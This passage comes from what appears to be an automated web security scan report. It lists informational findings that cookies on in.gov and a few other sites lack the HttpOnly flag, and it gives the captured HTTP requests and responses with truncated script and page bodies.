Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:27:56 GMT; path=/

...
//Script for Options iframe pages.
function dropdown(mySel)
{
var myWin, myVal;
myVal = mySel.options[mySel.selectedIndex].value;
if(myVal)
{
if(mySel.form.target)myWin = parent[mySel.form
...[SNIP]...

14.374. http://in.gov/core/js/arss.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/arss.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/js/arss.css HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:33:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:34:22 GMT; path=/
Content-Length: 191344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<me
...[SNIP]...

14.375. http://in.gov/core/js/arss.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/arss.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/js/arss.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:26:56 GMT
Server: Apache
Last-Modified: Mon, 07 Jun 2010 21:51:44 GMT
ETag: "3e9f99-9dc-48877adba5c00"
Accept-Ranges: bytes
Content-Length: 2524
Content-Type: application/javascript
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:27:56 GMT; path=/

/**
*
* Copyright (c) 2007, RightNow Technologies, Inc
*
* All rights reserved.
* Redistribution and use in source and binary forms, with or without modification, are permitted provided that
...[SNIP]...

14.376. http://in.gov/core/js/faq.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/faq.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/js/faq.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:26:51 GMT
Server: Apache
Last-Modified: Mon, 07 Jun 2010 21:52:01 GMT
ETag: "3e9f8b-198-48877aebdc240"
Accept-Ranges: bytes
Content-Length: 408
Content-Type: application/javascript
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:27:51 GMT; path=/

// FAQ Load
document.write('<script type="text/javascript" src="/core/js/arss.js"></script>');
function faqload(){
var reader2 = RNTFeed.getReader();
reader2.uri='http://iot.custhelp.com/c
...[SNIP]...

14.377. http://in.gov/core/js/jquery-1.4.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/jquery-1.4.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/js/jquery-1.4.2.min.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:08 GMT
Server: Apache
Last-Modified: Thu, 08 Apr 2010 19:09:14 GMT
ETag: "3e9f8d-119ee-483be6a1aaa80"
Accept-Ranges: bytes
Content-Length: 72174
Content-Type: application/javascript
Content-Language: en
X-Pad: avoid browser bug
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:08 GMT; path=/

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

14.378. http://in.gov/core/js/jquery.jfontsizer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/jquery.jfontsizer.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/js/jquery.jfontsizer.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerapps_ii_oss=4046653450.36895.0000; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:29:59 GMT
Server: Apache
Last-Modified: Thu, 22 Apr 2010 15:48:34 GMT
ETag: "3e9f93-86f-484d53e3e1880"
Accept-Ranges: bytes
Content-Length: 2159
Content-Type: application/javascript
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:30:59 GMT; path=/

/*
*
* jFontSizer Plugin
* Written by fluidByte - http://www.fluidbyte.net
*
*
*/

jQuery.fn.jfontsizer = function(o) {

   // Cookie functions
   function setCookie(c_name,value,expir
...[SNIP]...

14.379. http://in.gov/core/js/jquery.metadata.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/jquery.metadata.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/js/jquery.metadata.min.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerapps_ii_oss=4046653450.36895.0000; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:29:59 GMT
Server: Apache
Last-Modified: Fri, 21 Mar 2008 21:28:22 GMT
ETag: "3e9f94-50c-448f92a628980"
Accept-Ranges: bytes
Content-Length: 1292
Content-Type: application/javascript
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:30:59 GMT; path=/

/*
* Metadata - jQuery plugin for parsing metadata from elements
*
* Copyright (c) 2006 John Resig, Yehuda Katz, J.....rn Zaefferer, Paul McLanahan
*
* Dual licensed under the MIT and GPL license
...[SNIP]...

14.380. http://in.gov/core/js/jquery.slideshow.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/jquery.slideshow.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/js/jquery.slideshow.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerapps_ii_oss=4046653450.36895.0000; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:29:59 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 18:59:52 GMT
ETag: "3e9f91-2457-483960cec7a00"
Accept-Ranges: bytes
Content-Length: 9303
Content-Type: application/javascript
Content-Language: en
X-Pad: avoid browser bug
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:30:59 GMT; path=/

/**
*    jquery.slideShow (1.0.6)
*    by Marcel Eichner (www.marceleichner.de)
*    <love@ephigenia.de>
*
*    This simple slideshow plugin will provide your effect gallery with
*    some simple features:

...[SNIP]...

14.381. http://in.gov/core/js/jquery.swapimage.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/jquery.swapimage.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/js/jquery.swapimage.min.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerapps_ii_oss=4046653450.36895.0000; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:29:59 GMT
Server: Apache
Last-Modified: Sun, 07 Feb 2010 03:38:36 GMT
ETag: "3e9f95-8be-47efa6b6be700"
Accept-Ranges: bytes
Content-Length: 2238
Content-Type: application/javascript
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:30:59 GMT; path=/

/**
* swapImage - jQuery plugin for swapping image
*
* Copyright (c) 2010 tszming (tszming@gmail.com)
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-l
...[SNIP]...

14.382. http://in.gov/core/js/menu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/menu.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/js/menu.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerapps_ii_oss=4046653450.36895.0000; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:29:59 GMT
Server: Apache
Last-Modified: Thu, 08 Apr 2010 19:58:05 GMT
ETag: "3e9f90-233-483bf18ce2d40"
Accept-Ranges: bytes
Content-Length: 563
Content-Type: application/javascript
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:30:59 GMT; path=/

function initMenu() {
$('#rightnav #menu ul').hide();
$('#rightnav #menu ul:first').show();
$('#rightnav #menu li a').click(
function() {
var checkElement = $(this).next();

...[SNIP]...

14.383. http://in.gov/core/js/portal_scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/portal_scripts.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/js/portal_scripts.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:09 GMT
Server: Apache
Last-Modified: Wed, 25 Aug 2010 12:02:01 GMT
ETag: "3e9f8e-4a22-48ea4a6334040"
Accept-Ranges: bytes
Content-Length: 18978
Content-Type: application/javascript
Content-Language: en
X-Pad: avoid browser bug
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:28:09 GMT; path=/

<!--Slideshow JS -->
/**
*    jquery.slideShow (1.0.6)
*    by Marcel Eichner (www.marceleichner.de)
*    <love@ephigenia.de>
*
*    This simple slideshow plugin will provide your effect gallery with
*    s
...[SNIP]...

14.384. http://in.gov/core/js/prototype-1.6.1.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/prototype-1.6.1.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/js/prototype-1.6.1.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:26:57 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 14:43:14 GMT
ETag: "3e9f98-2355c-4870798262480"
Accept-Ranges: bytes
Content-Length: 144732
Content-Type: application/javascript
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:27:57 GMT; path=/

/* Prototype JavaScript framework, version 1.6.1
* (c) 2005-2009 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Protot
...[SNIP]...

14.385. http://in.gov/core/online_services.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/online_services.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/online_services.html HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:29:55 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1865746442.20480.0000; expires=Sat, 30-Apr-2011 01:30:55 GMT; path=/
Content-Length: 32871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- Insta
...[SNIP]...

14.386. http://in.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:36:57 GMT
Server: Apache
Last-Modified: Tue, 25 Sep 2007 19:01:38 GMT
ETag: "21f435-47e-43afa5ddf6880"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:37:57 GMT; path=/

............ .h.......(....... ..... .....................................................................................................h# ug"..g"..g"..f!..f!.(f!.5..................................
...[SNIP]...

14.387. http://in.gov/gov/photo.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /gov/photo.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gov/photo.htm HTTP/1.1
Host: in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:21:09 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:22:09 GMT; path=/
Content-Length: 61001

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2397 - pub
...[SNIP]...

14.388. http://in.gov/sos/securities/2521.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /sos/securities/2521.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sos/securities/2521.htm HTTP/1.1
Host: in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:21:12 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:22:12 GMT; path=/
Content-Length: 27940

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2423 - pub
...[SNIP]...

14.389. http://in.gov/spd/2333.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /spd/2333.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /spd/2333.htm HTTP/1.1
Host: in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:21:15 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:22:15 GMT; path=/
Content-Length: 25587

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2333 - pub
...[SNIP]...

14.390. http://in.gov/void()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /void()

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /void() HTTP/1.1
Host: in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:21:20 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:22:20 GMT; path=/
Content-Length: 191344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<me
...[SNIP]...

14.391. http://io9.com/assets/base.v9/js/selcontsimple.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://io9.com
Path:   /assets/base.v9/js/selcontsimple.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/base.v9/js/selcontsimple.js?rnd=0.40150984179455956 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: io9.com

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:18:58 GMT
Server: Apache
Last-Modified: Wed, 08 Sep 2010 15:35:50 GMT
ETag: "1aa0eb2-1738-48fc144a58180"
Accept-Ranges: bytes
ntCoent-Length: 5944
Cache-Control: max-age=14400
Expires: Sat, 30 Apr 2011 16:18:58 GMT
Vary: Accept-Encoding
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
GawkerApplicationHost: ganja
GawkerHost: GM39 - Request took D=477 at t=1304165938260843 on site io9.com (live)
Content-Type: application/x-javascript
Set-Cookie: NSC_hbxlfs-qppm=8efb34173660;path=/
Content-Length: 5944

/*
* Original readability script:
* javascript:(function(){readStyle='style-newspaper';readSize='size-medium';readMargin='margin-wide';_readability_script=document.createElement('SCRIPT');_readabili
...[SNIP]...

14.392. https://iris.custhelp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: http://www.va.gov/iris/home.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
